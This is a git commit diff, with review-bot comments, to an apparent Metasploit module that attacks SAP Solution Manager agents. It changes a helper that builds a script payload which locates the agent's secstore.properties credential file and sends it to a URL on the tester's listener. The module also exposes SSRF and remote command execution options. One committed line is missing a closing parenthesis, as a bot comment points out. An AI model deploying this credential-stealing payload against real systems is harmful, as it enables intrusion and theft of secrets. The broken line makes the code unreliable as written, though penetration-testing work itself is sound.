Update #make_steal_credentials_payload to just take url

Spencer McIntyre
2026-02-26 11:45:54 -05:00
parent 1b528c78f0
commit 3f2a07bdca
2 changed files with 4 additions and 6 deletions
@@ -49,8 +49,8 @@ module Msf
end
# Make payload for steal credentials for SolMan server from agent
def make_steal_credentials_payload(instance, host, port, url)
command = "var u = new Packages.java.net.URL(\"http://#{host}:#{port}#{url}\");"
def make_steal_credentials_payload(instance, url)
command = "var u = new Packages.java.net.URL(\"#{url}\");"
command << 'var o = Packages.java.lang.System.getProperty("os.name").toLowerCase();'
command << 'if (o.indexOf("win") >= 0) '
command << "{var p = Packages.java.nio.file.Paths.get(\"C:\\\\usr\\\\sap\\\\DAA\\\\#{instance}\\\\SMDAgent\\\\configuration\\\\secstore.properties\");} "
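Review bot: The comment above `make_steal_credentials_payload` does not record the new contract for `url`: the helper no longer prepends `http://host:port`, so callers must now pass a complete absolute URL, and nothing on the visible lines checks that. I would extend the comment with `# @param url [String] absolute URL (scheme, host, port, path) placed verbatim in the generated script`. Both `url` and `instance` are interpolated into double-quoted script literals without escaping, so a value containing `"` or `\` would alter the generated script; the comment should say so, or the method should reject such values. The method body continues past the end of this hunk.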
@@ -58,7 +58,7 @@ class MetasploitModule < Msf::Auxiliary
OptString.new('SSRF_METHOD', [true, 'HTTP method for SSRF', 'GET'], conditions: %w[ACTION == SSRF]),
OptString.new('SSRF_URI', [true, 'URI for SSRF', 'http://127.0.0.1:80/'], conditions: %w[ACTION == SSRF]),
OptString.new('COMMAND', [true, 'Command for execute in agent', 'id'], conditions: %w[ACTION == EXEC]),
OptAddress.new('SRVHOST', [ true, 'The local IP address to listen HTTP requests from agents', '192.168.1.1' ], conditions: %w[ACTION == SECSTORE]),
OptAddressRoutable.new('SRVHOST', [ false, 'The local IP address to listen HTTP requests from agents' ], conditions: %w[ACTION == SECSTORE]),
OptPort.new('SRVPORT', [ true, 'The local port to listen HTTP requests from agents', 8000 ], conditions: %w[ACTION == SECSTORE]),
OptString.new('AGENT', [true, 'Agent server name for exec command or SSRF', 'agent_server_name'], conditions: ['ACTION', 'in', %w[SSRF EXEC SECSTORE]]),
]
@@ -68,8 +68,6 @@ class MetasploitModule < Msf::Auxiliary
def setup_xml_and_variables
@host = datastore['RHOSTS']
@port = datastore['RPORT']
@srv_host = srvhost
@srv_port = datastore['SRVPORT']
@path = datastore['TARGETURI']
@agent_name = datastore['AGENT']
@@ -255,7 +253,7 @@ class MetasploitModule < Msf::Auxiliary
}
}
)
@creds_payload = make_steal_credentials_payload(agent[:instanceName], @srv_host, @srv_port, "/#{@script_name}")
@creds_payload = make_steal_credentials_payload(agent[:instanceName], get_uri("/#{@script_name}")
print_status("Start script: #{@script_name} with payload for retrieving SolMan credentials file from agent: #{@agent_name}")
send_soap_request(make_soap_body(@agent_name, @script_name, @creds_payload))
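Review bot: The new call on the `@creds_payload` line is missing a closing parenthesis: `get_uri("/#{@script_name}")` closes only the inner call, so `make_steal_credentials_payload(` stays open and the file will not parse. It should read `@creds_payload = make_steal_credentials_payload(agent[:instanceName], get_uri("/#{@script_name}"))`. `get_uri` is defined outside this diff, so it is worth confirming that it accepts a path argument rather than a client object; if it does not, the path would have to be appended to its result instead. With `SRVHOST` now optional in the options hunk, also confirm that the URL it returns is one the agent can reach when the option is left unset. The enclosing method starts and ends outside the hunk.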